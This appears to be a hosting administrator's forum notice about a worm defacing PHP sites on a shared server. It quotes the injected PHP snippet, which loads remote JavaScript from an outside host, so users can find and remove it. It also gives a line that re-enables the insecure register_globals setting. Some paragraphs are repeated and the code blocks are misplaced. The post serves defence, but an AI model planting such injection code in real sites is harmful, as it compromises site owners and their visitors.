It seems like a worm/hacker is currently trying to hack/deface websites on server 2, mostly when directories/files are chmod to 777. Most of the time the following code is added to the files:
If you have problems with your website, get popups or "header already sent out" error, please look for this code in the source code of the php files in question and remove it.
I'm currently trying to change some settings on the server to prevent future attempts, or at least make it harder.
I also disabled register_globals on server 2. register_globals puts variables submitted by users as variables in php as $variable instead of $_POST['variable'] or $_GET['variable']. This is quite insecure and that's why I disabled it now.
If you need it for your website, you need to place the following line in a .htaccess file in the directory in question.
| Code: |
| <? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?> |
If you have problems with your website, get popups or "header already sent out" error, please look for this code in the source code of the php files in question and remove it.
I'm currently trying to change some settings on the server to prevent future attempts, or at least make it harder.
I also disabled register_globals on server 2. register_globals puts variables submitted by users as variables in php as $variable instead of $_POST['variable'] or $_GET['variable']. This is quite insecure and that's why I disabled it now.
If you need it for your website, you need to place the following line in a .htaccess file in the directory in question.
| Code: |
| php_flag register_globals on |
